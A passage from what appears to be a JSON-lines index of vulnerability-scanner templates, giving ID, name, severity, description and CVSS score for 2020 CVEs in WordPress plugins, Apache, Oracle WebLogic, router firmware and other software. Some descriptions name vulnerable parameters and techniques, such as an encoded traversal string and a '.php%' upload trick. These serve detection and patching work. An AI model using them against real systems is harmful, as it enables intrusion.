2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-11854.yaml"} +{"ID":"CVE-2020-11930","Info":{"Name":"WordPress GTranslate \u003c2.8.52 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-11930.yaml"} +{"ID":"CVE-2020-11978","Info":{"Name":"Apache Airflow \u003c=1.10.10 - Remote Code Execution","Severity":"high","Description":"Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-11978.yaml"} +{"ID":"CVE-2020-11991","Info":{"Name":"Apache Cocoon 2.1.12 - XML Injection","Severity":"high","Description":"Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-11991.yaml"} +{"ID":"CVE-2020-12054","Info":{"Name":"WordPress Catch Breadcrumb \u003c1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-12054.yaml"} +{"ID":"CVE-2020-12116","Info":{"Name":"Zoho ManageEngine OpManger - Arbitrary File Read","Severity":"high","Description":"Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-12116.yaml"} +{"ID":"CVE-2020-12127","Info":{"Name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","Severity":"high","Description":"An information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-12127.yaml"} +{"ID":"CVE-2020-12447","Info":{"Name":"Onkyo TX-NR585 Web Interface - Directory Traversal","Severity":"high","Description":"Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-12447.yaml"} +{"ID":"CVE-2020-12478","Info":{"Name":"TeamPass 2.1.27.36 - Unauthenticated Access","Severity":"high","Description":"TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-12478.yaml"} +{"ID":"CVE-2020-12720","Info":{"Name":"vBulletin SQL Injection","Severity":"critical","Description":"vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-12720.yaml"} +{"ID":"CVE-2020-12800","Info":{"Name":"WordPress Contact Form 7 \u003c1.3.3.3 - Remote Code Execution","Severity":"critical","Description":"WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-12800.yaml"} +{"ID":"CVE-2020-13117","Info":{"Name":"Wavlink Multiple AP - Remote Command Injection","Severity":"critical","Description":"Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the \"key\" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-13117.yaml"} +{"ID":"CVE-2020-13121","Info":{"Name":"Submitty 20.04.01 - Open redirect","Severity":"medium","Description":"Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.","Classification":{"CVSSScore":"6.10"}},"file_path":"cves/2020/CVE-2020-13121.yaml"} +{"ID":"CVE-2020-13158","Info":{"Name":"Artica Proxy Community Edition \u003c4.30.000000 - Local File Inclusion","Severity":"high","Description":"Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-13158.yaml"} +{"ID":"CVE-2020-13167","Info":{"Name":"Netsweeper \u003c=6.4.3 - Python Code Injection","Severity":"critical","Description":"Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-13167.yaml"} +{"ID":"CVE-2020-13258","Info":{"Name":"Contentful \u003c=2020-05-21 - Cross-Site Scripting","Severity":"medium","Description":"Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-13258.yaml"} +{"ID":"CVE-2020-13405","Info":{"Name":"MicroWeber - Unauthenticated User Database Disclosure","Severity":"high","Description":"The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-13405.yaml"} +{"ID":"CVE-2020-13483","Info":{"Name":"Bitrix24 \u003c=20.0.0 - Cross-Site Scripting","Severity":"medium","Description":"The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-13483.yaml"} +{"ID":"CVE-2020-13700","Info":{"Name":"WordPresss acf-to-rest-api \u003c=3.1.0 - Insecure Direct Object Reference","Severity":"high","Description":"WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-13700.yaml"} +{"ID":"CVE-2020-13820","Info":{"Name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","Severity":"medium","Description":"Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-13820.yaml"} +{"ID":"CVE-2020-13927","Info":{"Name":"Airflow Experimental \u003c1.10.11 - REST API Auth Bypass","Severity":"critical","Description":"Airflow's Experimental API prior 1.10.11 allows all API requests without authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-13927.yaml"} +{"ID":"CVE-2020-13937","Info":{"Name":"Apache Kylin - Exposed Configuration File","Severity":"medium","Description":"Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-13937.yaml"} +{"ID":"CVE-2020-13942","Info":{"Name":"Apache Unomi \u003c1.5.2 - Remote Code Execution","Severity":"critical","Description":"Apache Unomi allows conditions to use OGNL and MVEL scripting which\noffers the possibility to call static Java classes from the JDK\nthat could execute code with the permission level of the running Java process.\nThis vulnerability affects all versions of Apache Unomi prior to 1.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-13942.yaml"} +{"ID":"CVE-2020-13945","Info":{"Name":"Apache APISIX - Insufficiently Protected Credentials","Severity":"medium","Description":"Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2020/CVE-2020-13945.yaml"} +{"ID":"CVE-2020-14092","Info":{"Name":"WordPress PayPal Pro \u003c1.1.65 - SQL Injection","Severity":"critical","Description":"WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-14092.yaml"} +{"ID":"CVE-2020-14179","Info":{"Name":"Sensitive data exposure via insecure Jira endpoint","Severity":"medium","Description":"Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-14179.yaml"} +{"ID":"CVE-2020-14181","Info":{"Name":"User enumeration via insecure Jira endpoint","Severity":"medium","Description":"Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-14181.yaml"} +{"ID":"CVE-2020-14408","Info":{"Name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-14408.yaml"} +{"ID":"CVE-2020-14413","Info":{"Name":"NeDi 1.9C - Cross-Site Scripting","Severity":"medium","Description":"NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-14413.yaml"} +{"ID":"CVE-2020-14750","Info":{"Name":"Oracle WebLogic Server - Remote Command Execution","Severity":"critical","Description":"Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-14750.yaml"} +{"ID":"CVE-2020-14864","Info":{"Name":"Oracle Fusion - Directory Traversal/Local File Inclusion","Severity":"high","Description":"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via \"getPreviewImage.\"","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-14864.yaml"} +{"ID":"CVE-2020-14882","Info":{"Name":"Oracle Weblogic Server - Remote Command Execution","Severity":"critical","Description":"Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-14882.yaml"} +{"ID":"CVE-2020-14883","Info":{"Name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","Severity":"high","Description":"The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2020/CVE-2020-14883.yaml"} +{"ID":"CVE-2020-15050","Info":{"Name":"Suprema BioStar \u003c2.8.2 - Local File Inclusion","Severity":"high","Description":"Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-15050.yaml"} +{"ID":"CVE-2020-15129","Info":{"Name":"Traefik - Open Redirect","Severity":"medium","Description":"Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"4.7"}},"file_path":"cves/2020/CVE-2020-15129.yaml"} +{"ID":"CVE-2020-15148","Info":{"Name":"Yii 2 \u003c 2.0.38 - Remote Code Execution","Severity":"critical","Description":"Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2020/CVE-2020-15148.yaml"} +{"ID":"CVE-2020-15227","Info":{"Name":"Nette Framework - Remote Code Execution","Severity":"critical","Description":"Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-15227.yaml"} +{"ID":"CVE-2020-15500","Info":{"Name":"TileServer GL \u003c=3.0.0 - Cross-Site Scripting","Severity":"medium","Description":"TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-15500.yaml"} +{"ID":"CVE-2020-15505","Info":{"Name":"MobileIron Core \u0026 Connector \u003c= v10.6 \u0026 Sentry \u003c= v9.8 - Remote Code Execution","Severity":"critical","Description":"A remote code execution vulnerability in MobileIron Core \u0026 Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-15505.yaml"} +{"ID":"CVE-2020-15568","Info":{"Name":"TerraMaster TOS \u003c.1.29 - Remote Code Execution","Severity":"critical","Description":"TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-15568.yaml"} +{"ID":"CVE-2020-15920","Info":{"Name":"Mida eFramework \u003c=2.9.0 - Remote Command Execution","Severity":"critical","Description":"Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-15920.yaml"} +{"ID":"CVE-2020-16139","Info":{"Name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","Severity":"high","Description":"Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-16139.yaml"} +{"ID":"CVE-2020-16846","Info":{"Name":"SaltStack \u003c=3002 - Shell Injection","Severity":"critical","Description":"SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-16846.yaml"} +{"ID":"CVE-2020-16952","Info":{"Name":"Microsoft SharePoint - Remote Code Execution","Severity":"high","Description":"Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package.","Classification":{"CVSSScore":"7.8"}},"file_path":"cves/2020/CVE-2020-16952.yaml"} +{"ID":"CVE-2020-17362","Info":{"Name":"Nova Lite \u003c 1.3.9 - Cross-Site Scripting","Severity":"medium","Description":"Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-17362.yaml"} +{"ID":"CVE-2020-17453","Info":{"Name":"WSO2 Carbon Management Console \u003c=5.10 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-17453.yaml"} +{"ID":"CVE-2020-17456","Info":{"Name":"SEOWON INTECH SLC-130 \u0026 SLR-120S - Unauthenticated Remote Code Execution","Severity":"critical","Description":"SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-17456.yaml"} +{"ID":"CVE-2020-17496","Info":{"Name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","Severity":"critical","Description":"vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-17496.yaml"} +{"ID":"CVE-2020-17505","Info":{"Name":"Artica Web Proxy 4.30 - OS Command Injection","Severity":"high","Description":"Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-17505.yaml"} +{"ID":"CVE-2020-17506","Info":{"Name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","Severity":"critical","Description":"Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-17506.yaml"} +{"ID":"CVE-2020-17518","Info":{"Name":"Apache Flink 1.5.1 - Local File Inclusion","Severity":"high","Description":"Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-17518.yaml"} +{"ID":"CVE-2020-17519","Info":{"Name":"Apache Flink - Local File Inclusion","Severity":"high","Description":"Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-17519.yaml"} +{"ID":"CVE-2020-17526","Info":{"Name":"Apache Airflow \u003c1.10.14 - Authentication Bypass","Severity":"high","Description":"Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.\n","Classification":{"CVSSScore":"7.7"}},"file_path":"cves/2020/CVE-2020-17526.yaml"} +{"ID":"CVE-2020-17530","Info":{"Name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-17530.yaml"} +{"ID":"CVE-2020-18268","Info":{"Name":"Z-Blog \u003c=1.5.2 - Open Redirect","Severity":"medium","Description":"Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-18268.yaml"} +{"ID":"CVE-2020-19282","Info":{"Name":"Jeesns 1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-19282.yaml"} +{"ID":"CVE-2020-19283","Info":{"Name":"Jeesns 1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-19283.yaml"} +{"ID":"CVE-2020-19295","Info":{"Name":"Jeesns 1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-19295.yaml"} +{"ID":"CVE-2020-19360","Info":{"Name":"FHEM 6.0 - Local File Inclusion","Severity":"high","Description":"FHEM version 6.0 suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-19360.yaml"} +{"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-1938.yaml"} +{"ID":"CVE-2020-1943","Info":{"Name":"Apache OFBiz \u003c=16.11.07 - Cross-Site Scripting","Severity":"medium","Description":"Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-1943.yaml"} +{"ID":"CVE-2020-19625","Info":{"Name":"Gridx 1.3 - Remote Code Execution","Severity":"critical","Description":"Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-19625.yaml"} +{"ID":"CVE-2020-20285","Info":{"Name":"ZZcms - Cross-Site Scripting","Severity":"medium","Description":"ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2020/CVE-2020-20285.yaml"} +{"ID":"CVE-2020-20300","Info":{"Name":"WeiPHP 5.0 - SQL Injection","Severity":"critical","Description":"WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-20300.yaml"} +{"ID":"CVE-2020-2036","Info":{"Name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","Severity":"high","Description":"PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-2036.yaml"} +{"ID":"CVE-2020-2096","Info":{"Name":"Jenkins Gitlab Hook \u003c=1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-2096.yaml"} +{"ID":"CVE-2020-20982","Info":{"Name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","Severity":"critical","Description":"shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.","Classification":{"CVSSScore":"9.6"}},"file_path":"cves/2020/CVE-2020-20982.yaml"} +{"ID":"CVE-2020-20988","Info":{"Name":"DomainMOD 4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the \"or Expiring Between\" parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2020/CVE-2020-20988.yaml"} +{"ID":"CVE-2020-21012","Info":{"Name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-21012.yaml"} +{"ID":"CVE-2020-2103","Info":{"Name":"Diagnostic page exposed session cookies","Severity":"medium","Description":"Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2020/CVE-2020-2103.yaml"} +{"ID":"CVE-2020-21224","Info":{"Name":"Inspur ClusterEngine 4.0 - Remote Code Execution","Severity":"critical","Description":"Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-21224.yaml"} +{"ID":"CVE-2020-2140","Info":{"Name":"Jenkin Audit Trail \u003c=3.2 - Cross-Site Scripting","Severity":"medium","Description":"Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-2140.yaml"} +{"ID":"CVE-2020-22208","Info":{"Name":"74cms - ajax_street.php 'x' SQL Injection","Severity":"critical","Description":"SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-22208.yaml"} +{"ID":"CVE-2020-22209","Info":{"Name":"74cms - ajax_common.php SQL Injection","Severity":"critical","Description":"SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-22209.yaml"} +{"ID":"CVE-2020-22210","Info":{"Name":"74cms - ajax_officebuilding.php SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to 